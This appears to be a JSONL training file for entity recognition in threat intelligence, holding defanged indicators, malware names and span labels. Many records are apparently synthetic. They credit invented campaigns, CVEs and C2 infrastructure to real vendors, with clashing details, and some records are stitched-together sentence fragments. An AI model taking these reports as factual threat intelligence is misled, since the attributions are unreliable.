{"text": "Version # 4 : April 2020 — Domain : nampriknum[.]net Following the same pattern , this version has some added features and others , which were not in use , removed .", "spans": {"Indicator: nampriknum.net": [[36, 52]]}, "info": {"id": "cyner_train_002170", "source": "defanged_augment"}}
{"text": "Kaspersky GReAT detected a multi-stage attack chain. The initial phishing email from contact@document-share[.]link contained a link to hxxp://update-relay[.]org/assets/js/payload.js. This redirected to hxxps://cache-api[ . ]io/callback on gatewaymail[ . ]tech. A secondary email from updates@identity-verify[.]cc pointed to hxxp://mailcdn[ . ]link/wp-content/uploads/doc.php which delivered Raccoon Stealer. The final payload callback was hxxps://cachenode[ . ]tech/callback resolving to 192[.]94[.]70[.]51 via static-portal[.]live.", "spans": {"Organization: Kaspersky GReAT": [[0, 15]], "Indicator: contact@document-share.link": [[85, 114]], "Indicator: hxxp://update-relay.org/assets/js/payload.js": [[135, 181]], "Indicator: https://cache-api.io/callback": [[202, 235]], "Indicator: gatewaymail.tech": [[239, 259]], "Indicator: updates@identity-verify.cc": [[284, 312]], "Indicator: http://mailcdn.link/wp-content/uploads/doc.php": [[324, 374]], "Malware: Raccoon Stealer": [[391, 406]], "Indicator: hxxps://cachenode.tech/callback": [[439, 474]], "Indicator: 192.94.70.51": [[488, 506]], "Indicator: static-portal.live": [[511, 531]]}, "info": {"id": "synth_v2_01849", "source": "defanged_augment"}}
{"text": "Email account A Gmail account with password is mentioned in the sample ’ s code : It contains the victim ’ s exfiltrated data and “ cmd ” directory with commands for victim devices . We analyzed a new RATANKBA variant ( BKDR_RATANKBA.ZAEL–A ) , discovered in June 2017 , that uses a PowerShell script instead of its more traditional PE executable form—a version that other researchers also recently identified . APT33 : 91 [ . ] 235 [ . ] 142 [ . ] 76 mywinnetwork[.]ddns[.]net . If the target system met predefined requirements , the malware used Twitter to look for specific tweets from pre - made accounts created by MiniDuke ’s command and control ( C2 ) operators , with specific tags labeling encrypted URLs for backdoors .", "spans": {"System: Gmail": [[16, 21]], "Indicator: 91.235.142.76": [[420, 451]], "Indicator: mywinnetwork.ddns.net": [[452, 477]]}, "info": {"id": "cyberner_stix_train_000664", "source": "defanged_augment"}}
{"text": "Blog Post by Proofpoint: Tracking APT28's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-28217 against Microsoft Exchange deployments. The initial access vector involves spear-phishing emails from alert@login-portal[.]tech delivering Lumma Stealer. Post-compromise, the attackers deploy LockBit and use Mimikatz for reconnaissance. C2 infrastructure includes 192 [ . ] 132 [ . ] 221 [ . ] 95 and mailproxy[ . ]club. A staging server at hxxp://gateway-portal[.]tech/panel/index.html hosts additional tooling. Key artifact: C:\\Windows\\Temp\\agent.py (SHA1: 143eca93862194e53b2ba58f5d79b3c3249c64ae).", "spans": {"Organization: Proofpoint": [[13, 23]], "Vulnerability: CVE-2023-28217": [[119, 133]], "System: Microsoft Exchange": [[142, 160]], "Indicator: alert@login-portal.tech": [[236, 261]], "Malware: Lumma Stealer": [[273, 286]], "Malware: LockBit": [[326, 333]], "Indicator: 192.132.221.95": [[398, 430]], "Indicator: mailproxy.club": [[435, 453]], "Indicator: http://gateway-portal.tech/panel/index.html": [[475, 520]], "Indicator: 143eca93862194e53b2ba58f5d79b3c3249c64ae": [[593, 633]]}, "info": {"id": "synth_v2_01509", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.Virut.G W32/Trojan2.MPL W32[ . ]Virut[ . ]CF W32/Virut.GE Virus.Win32.Virut.ce Win32.Virut.AM Trojan.Opclose TR/VB.EWS Worm.Win32.SillyFDC!IK Worm/Kolab.jfi Virus:Win32/Virut.BN Win32/Virut.F W32/Trojan2.MPL Virus.Virut.13 Win32.Virut.dz Worm.Win32.SillyFDC W32/Sality.AO", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.Virut.CF": [[54, 74]]}, "info": {"id": "cyner2_train_003820", "source": "defanged_augment"}}
{"text": "Symantec published a threat intelligence report linking Charming Kitten to a new campaign exploiting CVE-2023-27691 in F5 BIG-IP. The attackers deployed ShadowPad via PowerShell Empire, establishing C2 communication with 10[.]201[.]234[.]248 and proxystatic[.]dev. A secondary payload was downloaded from hxxps://backupedge[.]com/callback. The malware binary (SHA256: 281d2eea1dfcb7d5200f553e234a990b41cb457d05d65e45c66328ecfc904e31) was dropped to /usr/local/bin/csrss.exe. Phishing emails were sent from service@auth-check[.]org targeting enterprise users. A backup C2 server was identified at 10[.]180[.]24[.]13.", "spans": {"Organization: Symantec": [[0, 8]], "Vulnerability: CVE-2023-27691": [[101, 115]], "System: F5 BIG-IP": [[119, 128]], "Malware: ShadowPad": [[153, 162]], "Indicator: 10.201.234.248": [[221, 241]], "Indicator: proxystatic.dev": [[246, 263]], "Indicator: hxxps://backupedge.com/callback": [[305, 338]], "Indicator: 281d2eea1dfcb7d5200f553e234a990b41cb457d05d65e45c66328ecfc904e31": [[368, 432]], "Indicator: service@auth-check.org": [[506, 530]], "Indicator: 10.180.24.13": [[596, 614]]}, "info": {"id": "synth_v2_00064", "source": "defanged_augment"}}
{"text": "Blog Post by NCSC: Tracking Midnight Blizzard's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-16338 against MOVEit Transfer deployments. The initial access vector involves spear-phishing emails from admin@auth-check[.]org delivering ShadowPad. Post-compromise, the attackers deploy Gootloader and use BITSAdmin for reconnaissance. C2 infrastructure includes 69 [ . ] 99 [ . ] 37 [ . ] 52 and proxymail[ . ]top. A staging server at hxxps://secureportal[ . ]site/assets/js/payload.js hosts additional tooling. Key artifact: /var/tmp/lsass.dmp (SHA1: 5d176d92465695888d1639974a3adb706d9ef024).", "spans": {"Organization: NCSC": [[13, 17]], "Vulnerability: CVE-2021-16338": [[125, 139]], "System: MOVEit Transfer": [[148, 163]], "Indicator: admin@auth-check.org": [[239, 261]], "Malware: ShadowPad": [[273, 282]], "Malware: Gootloader": [[322, 332]], "Indicator: 69.99.37.52": [[398, 427]], "Indicator: proxymail.top": [[432, 449]], "Indicator: https://secureportal.site/assets/js/payload.js": [[471, 521]], "Indicator: 5d176d92465695888d1639974a3adb706d9ef024": [[588, 628]]}, "info": {"id": "synth_v2_01566", "source": "defanged_augment"}}
{"text": "File collection module ( “ USB Stealer ” ) Internal name : msdetltemp[ . ]dll ( from resources ) File size : 50,176 bytes File format : PE32 EXE MD5: 0369620eb139c3875a62e36bb7abdae8 Linker version : 10.0 , Microsoft Visual Studio Linker timestamp : 2015.02.09 11:48:01 ( GMT ) Most of the strings inside the binary are encrypted using 3DES and XOR and reversed .", "spans": {"Indicator: msdetltemp.dll": [[59, 77]], "Indicator: 0369620eb139c3875a62e36bb7abdae8": [[150, 182]], "Organization: Microsoft": [[207, 216]]}, "info": {"id": "cyberner_stix_train_003934", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: RedLine Stealer (SHA256: 9ad46f3289ae2f5b329218fbde2389eec7bae31efe417b95eb66c1849bf670ba). Upon execution on Ubuntu 22.04, the sample creates C:\\Users\\admin\\AppData\\Local\\Temp\\payload.bin and injects into legitimate processes. Network analysis shows beaconing to 141[.]13[.]222[.]166 every 60 seconds and DNS queries to portalsecure[ . ]tech. The second stage was fetched from hxxps://backup-storage[ . ]cc/panel/index.html and written to /dev/shm/chrome_helper.exe. The payload uses Merlin-style techniques for defense evasion. A secondary hash (MD5: 7132903d1a97078e0a388d1c655dd3f7) was extracted from the unpacked payload.", "spans": {"Malware: RedLine Stealer": [[25, 40]], "Indicator: 9ad46f3289ae2f5b329218fbde2389eec7bae31efe417b95eb66c1849bf670ba": [[50, 114]], "System: Ubuntu 22.04": [[135, 147]], "Indicator: 141.13.222.166": [[289, 309]], "Indicator: portalsecure.tech": [[346, 367]], "Indicator: hxxps://backup-storage.cc/panel/index.html": [[403, 449]], "Indicator: 7132903d1a97078e0a388d1c655dd3f7": [[578, 610]]}, "info": {"id": "synth_v2_00560", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.VariantNetvat.Trojan Trojan.Netvat Backdoor.Trojan Trojan.Win32.Netvat.45056 Worm.Win32.Tenavt.A Trojan.DownLoader11.42361 BehavesLike[ . ]Win32[ . ]Downloader[ . ]pt W32/Trojan.SSPB-9075 Trojan:Win32/Netvat.E!Dll Trojan.Graftor.D29A7D Trojan/Win32.Menti.R124411 Win32.Trojan.Dropper.Heur Worm.Tenavt!JDujK3yXihg W32/Kryptik.DTAI!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Downloader.pt": [[153, 196]]}, "info": {"id": "cyner2_train_004593", "source": "defanged_augment"}}
{"text": "A vulnerability in the `lollms_generation_events.py` component of parisneo/lollms version 5.9.0 allows unauthenticated access to sensitive Socket[.]IO events. The `add_events` function registers event handlers such as `generate_text`, `cancel_generation`, `generate_msg`, and `generate_msg_from` without implementing authentication or authorization checks. This allows unauthenticated clients to execute resource-intensive or state-altering operations, leading to potential denial of service, state corruption, and race conditions. Additionally, the use of global flags (`lollmsElfServer.busy`, `lollmsElfServer.cancel_gen`) for state management in a multi-client environment introduces further vulnerabilities, enabling one client's actions to affect the server's state and other clients' operations. The lack of proper access control and reliance on insecure global state management significantly impacts the availability and integrity of the service.", "spans": {"Vulnerability: denial of service": [[474, 491]], "Indicator: Socket.IO": [[139, 150]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-1117"}}
{"text": "SentinelOne published a threat intelligence report linking APT29 to a new campaign exploiting CVE-2026-10752 in Zyxel USG. The attackers deployed Hive via LaZagne, establishing C2 communication with 10[.]136[.]67[.]238 and secure-backup[ . ]io. A secondary payload was downloaded from hxxp://edge-gateway[.]net/api/v2/auth. The malware binary (MD5: 24872fa35bbae64fda9a336ad763c164) was dropped to C:\\Users\\Public\\Documents\\payload.bin. Phishing emails were sent from verify@mail-service[.]info targeting enterprise users. A backup C2 server was identified at 113[.]248[.]62[.]8.", "spans": {"Organization: SentinelOne": [[0, 11]], "Vulnerability: CVE-2026-10752": [[94, 108]], "System: Zyxel USG": [[112, 121]], "Malware: Hive": [[146, 150]], "Indicator: 10.136.67.238": [[199, 218]], "Indicator: secure-backup.io": [[223, 243]], "Indicator: hxxp://edge-gateway.net/api/v2/auth": [[285, 322]], "Indicator: 24872fa35bbae64fda9a336ad763c164": [[349, 381]], "Indicator: verify@mail-service.info": [[468, 494]], "Indicator: 113.248.62.8": [[560, 578]]}, "info": {"id": "synth_v2_00027", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.GarusenV.Trojan Worm/W32.Vobfus.225280 Worm.Win32.Vobfus!O W32/Vobfus[ . ]io Trojan.Barys.950 WORM_VOBFUS.SM02 Win32.Trojan.VBObfus.f WORM_VOBFUS.SM02 Win.Trojan.Vobfus-28 Worm.Win32.Vobfus.biec Trojan.Win32.WBNA.cihuhh Worm.Win32.A.Vobfus.225280 TrojWare[ . ]Win32[ . ]Pronny[ . ]EE Trojan.VbCrypt.60 BehavesLike.Win32.VBObfus.dm Worm.Win32.Vobfus Worm/WBNA.dfdh WORM/Vobfus.dbmnua Worm.Win32.Vobfus.biec Trojan/Win32.Vobfus.R36953 BScope.Trojan.Diple Win32/Pronny.EJ W32/Vobfus.GEW.worm", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Vobfus.io": [[93, 106]], "Indicator: TrojWare.Win32.Pronny.EE": [[277, 313]]}, "info": {"id": "cyner2_train_004435", "source": "defanged_augment"}}
{"text": "Multiple Raccoon Stealer samples identified:\n- SHA256: 7358365e2dc8ea15a4ac6ff2bae98586509a061cf4577616bfd62799064f05b6\n- SHA256: 7e4853f423e45426b3c82c646fba101a7432a3c033a6202c99d2fdada764e56a\n- MD5: dc2756314e6140a5ee196df34e851441\n- MD5: 58b4aa8a743951b94aafdb9936511320\nAll samples beacon to 162 [ . ] 244 [ . ] 194 [ . ] 229 and portal-auth[[ . ]]info.", "spans": {"Malware: Raccoon Stealer": [[9, 24]], "Indicator: 7358365e2dc8ea15a4ac6ff2bae98586509a061cf4577616bfd62799064f05b6": [[55, 119]], "Indicator: 7e4853f423e45426b3c82c646fba101a7432a3c033a6202c99d2fdada764e56a": [[130, 194]], "Indicator: dc2756314e6140a5ee196df34e851441": [[202, 234]], "Indicator: 58b4aa8a743951b94aafdb9936511320": [[242, 274]], "Indicator: 162.244.194.229": [[297, 330]], "Indicator: portal-auth[.]info": [[335, 357]]}, "info": {"id": "synth_00071", "source": "defanged_augment"}}
{"text": "Further research led us to additional MoonWind samples using the same C2 ( dns[.]webswindows[.]com ) but hosted on a different compromised but legitimate website .", "spans": {"Indicator: dns.webswindows.com": [[75, 98]]}, "info": {"id": "dnrti_train_002188", "source": "defanged_augment"}}
{"text": "This is part of a class called CaptureService , which already existed in the previous version but it was not duly implemented . If a target of the spear phishing described in \" Phase 2 : malware deployment \" opened the email attachment and , crucially , clicked on the icon in the attachment , this would lead to the target 's computer becoming infected with the \" Scout \" malware tool from the RCS Galileo platform . All but one sample that we identified were written to this folder as word[.]exe . During the SolarWinds Compromise , APT29 registered devices in order to enable mailbox syncing via the Set - CASMailbox command . .006", "spans": {"Indicator: word.exe": [[487, 497]]}, "info": {"id": "cyberner_stix_train_001873", "source": "defanged_augment"}}
{"text": "Threat Intelligence Brief (SentinelOne): APT28 has been observed deploying Bumblebee in a new campaign targeting financial institutions. Initial access is gained through spear-phishing emails from phishing@secure-update[.]net. Infrastructure includes 203[.]13[.]150[.]123, 208 [ . ] 236 [ . ] 219 [ . ] 136, and dns-resolve[[ . ]]cc. SHA1 indicator: b1acc2a42a5160b4353f6b1fdf5c21cd16612bd2.", "spans": {"Organization: SentinelOne": [[27, 38]], "Malware: Bumblebee": [[75, 84]], "Indicator: phishing@secure-update.net": [[197, 225]], "Indicator: 203.13.150.123": [[251, 271]], "Indicator: 208.236.219.136": [[273, 306]], "Indicator: dns-resolve[.]cc": [[312, 332]], "Indicator: b1acc2a42a5160b4353f6b1fdf5c21cd16612bd2": [[350, 390]]}, "info": {"id": "synth_00037", "source": "defanged_augment"}}
{"text": "Palo Alto Unit 42 detected a multi-stage attack chain. The initial phishing email from finance@login-portal[ . ]tech contained a link to hxxps://cdn-cloud[.]live/panel/index.html. This redirected to hxxp://api-proxy[.]link/callback on auth-secure[.]link. A secondary email from support@identity-verify[.]cc pointed to hxxps://data-update[ . ]io/assets/js/payload.js which delivered Dridex. The final payload callback was hxxp://edgeupdate[ . ]io/assets/js/payload.js resolving to 175[.]237[.]247[.]33 via nodeupdate[.]info.", "spans": {"Organization: Palo Alto Unit 42": [[0, 17]], "Indicator: finance@login-portal.tech": [[87, 116]], "Indicator: https://cdn-cloud.live/panel/index.html": [[137, 178]], "Indicator: hxxp://api-proxy.link/callback": [[199, 231]], "Indicator: auth-secure.link": [[235, 253]], "Indicator: support@identity-verify.cc": [[278, 306]], "Indicator: hxxps://data-update.io/assets/js/payload.js": [[318, 365]], "Malware: Dridex": [[382, 388]], "Indicator: http://edgeupdate.io/assets/js/payload.js": [[421, 466]], "Indicator: 175.237.247.33": [[480, 500]], "Indicator: nodeupdate.info": [[505, 522]]}, "info": {"id": "synth_v2_01755", "source": "defanged_augment"}}
{"text": "Spaghetti and junk codes make common analyst tools ineffective In analyzing FinFisher , the first obfuscation problem that requires a solution is the removal of junk instructions and “ spaghetti code ” , which is a technique that aims to confuse disassembly programs . iDefense analysts have identified a campaign likely to be targeting members of— or those with affiliation or interest in—the ASEAN Defence Ministers ' Meeting ( ADMM ) . As far as we can tell , its dropper was downloaded over HTTPS from api[ . ]goallbandungtravel[ . ]com . The downloader uses managed AES ( Rijndael algorithm ) to decrypt the appended data which is then reflectively loaded as a byte array using the Assembly .", "spans": {"Malware: FinFisher": [[76, 85]], "Organization: iDefense": [[269, 277]], "Organization: Defence Ministers ' Meeting": [[400, 427]], "Organization: ADMM": [[430, 434]], "Indicator: api.goallbandungtravel.com": [[506, 540]], "Malware: The downloader": [[543, 557]]}, "info": {"id": "cyberner_stix_train_004140", "source": "defanged_augment"}}
{"text": "The jpg pulled from treestower[.]com displays a graphic picture of a dead man , which also appeared on a Palestinian news website discussing the death of Hamas military leader Mazen Fuqaha .", "spans": {"Indicator: treestower.com": [[20, 36]], "Organization: Hamas": [[154, 159]]}, "info": {"id": "cyberner_stix_train_007643", "source": "defanged_augment"}}
{"text": "Therefore sending the file path “ [.][.]\\[.][.]\\ secret_info[.]doc ”", "spans": {"Indicator: ..\\..\\ secret_info.doc": [[34, 66]]}, "info": {"id": "cyberner_stix_train_004509", "source": "defanged_augment"}}
{"text": "A buffer overflow vulnerability exists in Adobe Flash Player ( <=17 [ . ] 0 [ . ] 0 [ . ] 134 ) when parsing malformed FLV objects .", "spans": {"Indicator: 17.0.0.134": [[65, 93]]}, "info": {"id": "cyberner_stix_train_005211", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 10[.]190[.]72[.]10, the Qualys IR team identified Play running as C:\\Users\\admin\\Desktop\\agent.py. The threat actor, believed to be TA505, used LinPEAS for credential harvesting and Certutil for lateral movement. Exfiltrated data was sent to update-proxy[.]live and sync-sync[.]cc. The initial dropper (MD5: db6fb85023d76e426c358b623acd33b9) was delivered via a phishing email from report@identity-verify[ . ]cc. A second C2 node was observed at 192[.]225[.]232[.]244, with a persistence mechanism writing to C:\\ProgramData\\update.dll.", "spans": {"Indicator: 10.190.72.10": [[64, 82]], "Organization: Qualys": [[88, 94]], "Malware: Play": [[114, 118]], "Indicator: update-proxy.live": [[306, 325]], "Indicator: sync-sync.cc": [[330, 344]], "Indicator: db6fb85023d76e426c358b623acd33b9": [[372, 404]], "Indicator: report@identity-verify.cc": [[446, 475]], "Indicator: 192.225.232.244": [[510, 531]]}, "info": {"id": "synth_v2_00417", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32/Opanki.worm Backdoor.SDBot W32.W.Pakes!c Win32.Trojan.WisdomEyes.16070401.9500.9915 W32/Opanki.AY Backdoor.Sdbot Win.Trojan.Pakes-927 Backdoor.Win32.IRCBot.cq Trojan.Win32.Pakes.flbf Worm.Win32.IM-Pakes.150528 Worm.Win32.Oscarbot.BL BackDoor.IRC.Sdbot.170 Worm.Pakes.Win32.1 BehavesLike[ . ]Win32[ . ]Sdbot[ . ]cc W32/Opanki.NEXW-4186 Backdoor/IRCBot.etu WORM/Pakes.A Worm.Pakes.kcloud Backdoor.Win32.IRCBot.cq Worm/Win32.IRCBot.C2420 SScope.Backdoor.Sdbot Backdoor.SDBot Trj/Pakes.EB Win32/Oscarbot.BL Win32.Worm-im.Pakes.Aexo Worm.IRCBot!NcS/fGqoMio Backdoor.Win32.Aimbot W32/Opanki!worm.im", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Sdbot.cc": [[305, 343]]}, "info": {"id": "cyner2_train_001889", "source": "defanged_augment"}}
{"text": "Wolf Research claimed to shut down their operations but we clearly see that their previous work continues under another guise . Subdomains at phmail[.]us have been linked to malicious activity dating back as far as December 2011 . Similarly , the public disclosure of APT12 ’s intrusion at the New York Times also led to only a brief pause in the threat group ’s activity and immediate changes in TTPs . However , the template source code is quite different and the payload delivery uses different infrastructure .", "spans": {"Organization: New York Times": [[294, 308]], "Indicator: phmail.us": [[142, 153]]}, "info": {"id": "cyberner_stix_train_005305", "source": "defanged_augment"}}
{"text": "Vulnerability in the Oracle Fusion Middleware MapViewer product of Oracle Fusion Middleware (component: Tile Server). Supported versions that are affected are 12[.]2[.]1[.]3.0 and 12 [ . ] 2 [ . ] 1 [ . ] 4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Fusion Middleware MapViewer. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Fusion Middleware MapViewer, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Fusion Middleware MapViewer accessible data as well as unauthorized read access to a subset of Oracle Fusion Middleware MapViewer accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).", "spans": {"Indicator: 12.2.1.3": [[159, 173]], "Indicator: 12.2.1.4": [[180, 206]], "Organization: Oracle": [[21, 27], [67, 73], [318, 324], [471, 477], [672, 678], [774, 780]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-14607"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 192 [ . ] 241 [ . ] 134 [ . ] 168, the Symantec IR team identified Meduza Stealer running as C:\\Users\\admin\\AppData\\Local\\Temp\\helper.sh. The threat actor, believed to be APT29, used Certutil for credential harvesting and WinPEAS for lateral movement. Exfiltrated data was sent to storage-cdn[ . ]org and edge-storage[.]dev. The initial dropper (SHA1: fc811b4561f4eb4b62e4132862f6efb348bba2b8) was delivered via a phishing email from report@phishing-domain[.]com. A second C2 node was observed at 10 [ . ] 173 [ . ] 215 [ . ] 67, with a persistence mechanism writing to /dev/shm/chrome_helper.exe.", "spans": {"Indicator: 192.241.134.168": [[64, 97]], "Organization: Symantec": [[103, 111]], "Malware: Meduza Stealer": [[131, 145]], "Indicator: storage-cdn.org": [[345, 364]], "Indicator: edge-storage.dev": [[369, 387]], "Indicator: fc811b4561f4eb4b62e4132862f6efb348bba2b8": [[416, 456]], "Indicator: report@phishing-domain.com": [[498, 526]], "Indicator: 10.173.215.67": [[561, 592]]}, "info": {"id": "synth_v2_00412", "source": "defanged_augment"}}
{"text": "Inspecting the class C network for 185[.]162[.]235[.]0/24 shows us that another IP on the same network resolves to an OilRig domain , msoffice-cdn[.]com which we identified in August 2017 .", "spans": {"Indicator: 185.162.235.0": [[35, 54]], "Indicator: msoffice-cdn.com": [[134, 152]]}, "info": {"id": "dnrti_train_001181", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Qbot campaign:\nStage 1 dropper at C:\\Users\\Public\\Documents\\csrss.exe - SHA256: 77289f13c9feb06f40792f3245b5d8f5188d264eb7a65c616473d4f4308c1df9\nStage 2 loader at C:\\Users\\admin\\AppData\\Local\\Temp\\backdoor.elf - SHA256: 5c03dfd0628aa5f48aa5fee1c09d93e765da96a27b6e7d0848696679cb635da7\nFinal payload at C:\\Users\\Public\\Documents\\chrome_helper.exe - MD5: b1e428d4b2db8baaf9e016c7155edae3\nExfiltration module - MD5: b437c5c828d8540289bc021546b2474f\nAll stages communicated with 192 [ . ] 77 [ . ] 71 [ . ] 14. BloodHound signatures detected in Stage 2.", "spans": {"Malware: Qbot": [[22, 26]], "Indicator: 77289f13c9feb06f40792f3245b5d8f5188d264eb7a65c616473d4f4308c1df9": [[102, 166]], "Indicator: 5c03dfd0628aa5f48aa5fee1c09d93e765da96a27b6e7d0848696679cb635da7": [[242, 306]], "Indicator: b1e428d4b2db8baaf9e016c7155edae3": [[375, 407]], "Indicator: b437c5c828d8540289bc021546b2474f": [[435, 467]], "Indicator: 192.77.71.14": [[497, 527]]}, "info": {"id": "synth_v2_01874", "source": "defanged_augment"}}
{"text": "In case of both the documents ( Uri Terror Report[.]doc and mha-report[.]doc ) the malicious macro code was heavily obfuscated (used obscure variable/function names to make analysis harder ) and did not contain any auto execute functions .", "spans": {"Indicator: Uri Terror Report.doc": [[32, 55]], "Indicator: mha-report.doc": [[60, 76]]}, "info": {"id": "cyberner_stix_train_004354", "source": "defanged_augment"}}
{"text": "ESET Research published a threat intelligence report linking Lazarus Group to a new campaign exploiting CVE-2023-39714 in Apache Struts. The attackers deployed Raccoon Stealer via Burp Suite, establishing C2 communication with 161 [ . ] 64 [ . ] 67 [ . ] 135 and proxyrelay[ . ]live. A secondary payload was downloaded from hxxp://edgerelay[ . ]org/collect. The malware binary (SHA1: cc1cd3ba31b256bac1fef3b924d0ed6c9940c3a9) was dropped to C:\\Windows\\Tasks\\shell.php. Phishing emails were sent from contact@urgent-notice[.]online targeting enterprise users. A backup C2 server was identified at 10 [ . ] 17 [ . ] 182 [ . ] 221.", "spans": {"Organization: ESET Research": [[0, 13]], "Vulnerability: CVE-2023-39714": [[104, 118]], "System: Apache Struts": [[122, 135]], "Malware: Raccoon Stealer": [[160, 175]], "Indicator: 161.64.67.135": [[227, 258]], "Indicator: proxyrelay.live": [[263, 282]], "Indicator: hxxp://edgerelay.org/collect": [[324, 356]], "Indicator: cc1cd3ba31b256bac1fef3b924d0ed6c9940c3a9": [[384, 424]], "Indicator: contact@urgent-notice.online": [[500, 530]], "Indicator: 10.17.182.221": [[596, 627]]}, "info": {"id": "synth_v2_00173", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Backdoor.Zegost.FC.2167 Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.DownLoader22.48526 BehavesLike[ . ]Win32[ . ]Trojan[ . ]cc Trojan.MSIL.Bladabindi.1 MSIL/Injector.PJG!tr Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Trojan.cc": [[119, 158]]}, "info": {"id": "cyner2_train_004219", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: NSA identified a large-scale phishing operation. Emails originated from finance@auth-check[ . ]org and support@account-update[.]xyz, spoofing legitimate services. Victims were directed to hxxp://cloudrelay[ . ]xyz/api/v2/auth which hosted a credential harvesting page on relay-api[ . ]xyz. A secondary link hxxp://nodeproxy[ . ]xyz/callback delivered AgentTesla (SHA1: 1ca174c0cf3db898a4ae7f0523145b26e0479387). The malware was saved to C:\\Users\\admin\\Desktop\\shell.php and established C2 with 10[.]180[.]123[.]205.", "spans": {"Organization: NSA": [[26, 29]], "Indicator: finance@auth-check.org": [[98, 124]], "Indicator: support@account-update.xyz": [[129, 157]], "Indicator: http://cloudrelay.xyz/api/v2/auth": [[214, 251]], "Indicator: relay-api.xyz": [[297, 314]], "Indicator: http://nodeproxy.xyz/callback": [[333, 366]], "Malware: AgentTesla": [[377, 387]], "Indicator: 1ca174c0cf3db898a4ae7f0523145b26e0479387": [[395, 435]], "Indicator: 10.180.123.205": [[520, 540]]}, "info": {"id": "synth_v2_00895", "source": "defanged_augment"}}
{"text": "% 20Configuratore % 20v5_4_2.apk http : //vodafoneinfinity[ . ]sytes[ . ]net/190/configurazione/vodafone/smartphone/ 2015-01-14 http : //windupdate[.]serveftp[.]com/wind/LTE/WIND % 20Configuratore % 20v5_4_2.apk http : //windupdate[ . ]serveftp[ . ]com/wind/LTE/ 2015-03-31 http : //119.network/lte/Internet-TIM-4G-LTE.apk http : //119.network/lte/download.html In China alone , we have seen underground market sheep shavers” ported SMS rogue marketing strategy to spread Alipay Red Packet referral URL links . APT12 : IXESHE , DynCalc , Numbered Panda , DNSCALC .", "spans": {"Indicator: vodafoneinfinity.sytes.net": [[42, 76]], "Indicator: windupdate.serveftp.com": [[137, 164], [221, 252]]}, "info": {"id": "cyberner_stix_train_007147", "source": "defanged_augment"}}
{"text": "Brexit 15[.]11[.]2018[.]docx :", "spans": {"Indicator: Brexit 15.11.2018.docx": [[0, 28]]}, "info": {"id": "cyberner_stix_train_006055", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2021-16338 is a critical command injection affecting Citrix NetScaler. Microsoft MSRC confirmed active exploitation by Silk Typhoon in the wild. Exploitation delivers BlackCat (MD5: db8c180ea026a5b03447049556e2dd1e) which is dropped to C:\\ProgramData\\ntds.dit. The exploit payload is hosted at hxxp://data-mail[.]club/login and communicates to 128[.]183[.]65[.]179 for C2.", "spans": {"Vulnerability: CVE-2021-16338": [[24, 38]], "Vulnerability: command injection": [[53, 70]], "System: Citrix NetScaler": [[81, 97]], "Organization: Microsoft MSRC": [[99, 113]], "Malware: BlackCat": [[195, 203]], "Indicator: db8c180ea026a5b03447049556e2dd1e": [[210, 242]], "Indicator: hxxp://data-mail.club/login": [[322, 351]], "Indicator: 128.183.65.179": [[372, 392]]}, "info": {"id": "synth_v2_00810", "source": "defanged_augment"}}
{"text": "IOC Summary for Cobalt Strike campaign:\n- 151 [ . ] 208 [ . ] 223 [ . ] 2\n- 84[.]179[.]109[.]88\n- 151 [ . ] 40 [ . ] 56 [ . ] 246\n- rat-control[[.]]info\n- fast-cdn[[ . ]]xyz\n- SHA256: 925c5faf93a600754ce395b64ef13196e5e670d8b231e84af46c592f03efd090\n- MD5: d320dd00f5ddfb60c0ded9784da44284", "spans": {"Malware: Cobalt Strike": [[16, 29]], "Indicator: 151.208.223.2": [[42, 73]], "Indicator: 84.179.109.88": [[76, 95]], "Indicator: 151.40.56.246": [[98, 129]], "Indicator: rat-control[.]info": [[132, 152]], "Indicator: fast-cdn[.]xyz": [[155, 173]], "Indicator: 925c5faf93a600754ce395b64ef13196e5e670d8b231e84af46c592f03efd090": [[184, 248]], "Indicator: d320dd00f5ddfb60c0ded9784da44284": [[256, 288]]}, "info": {"id": "synth_00004", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to avoid UAF in f2fs_sync_inode_meta()\n\nsyzbot reported an UAF issue as below: [1] [2]\n\n[1] hxxps://syzkaller[ . ]appspot[ . ]com/text?tag=CrashReport&x=16594c60580000\n\n==================================================================\nBUG: KASAN: use-after-free in __list_del_entry_valid+0xa6/0x130 lib/list_debug.c:62\nRead of size 8 at addr ffff888100567dc8 by task kworker/u4:0/8\n\nCPU: 1 PID: 8 Comm: kworker/u4:0 Tainted: G        W          6.1.129-syzkaller-00017-g642656a36791 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/12/2025\nWorkqueue: writeback wb_workfn (flush-7:0)\nCall Trace:\n <TASK>\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x151/0x1b7 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:316 [inline]\n print_report+0x158/0x4e0 mm/kasan/report.c:427\n 